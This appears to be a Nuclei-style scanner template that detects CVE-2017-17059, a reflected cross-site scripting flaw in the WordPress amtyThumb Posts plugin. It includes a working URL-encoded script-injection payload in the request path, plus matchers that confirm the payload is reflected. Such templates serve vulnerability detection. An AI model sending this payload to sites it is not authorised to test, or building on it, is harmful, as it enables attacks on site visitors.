53 lines
1.7 KiB
YAML
53 lines
1.7 KiB
YAML
id: CVE-2017-17059
|
|
|
|
info:
|
|
name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
|
|
remediation: |
|
|
Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.
|
|
reference:
|
|
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
|
- https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-17059
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00261
|
|
epss-percentile: 0.63646
|
|
cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: amtythumb_project
|
|
product: amtythumb
|
|
framework: wordpress
|
|
tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
|
|
|
|
body: "amty_hidden=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450220582ffa1e75db83387dd6e00806111a84e02c27157938b6b87a879abe6e988356022100b01c803895a70b89d1fd0d005c2a60f556f91b3c6b5e1a132e814aba690afba0:922c64590222798bb761d5b6d8e72950
|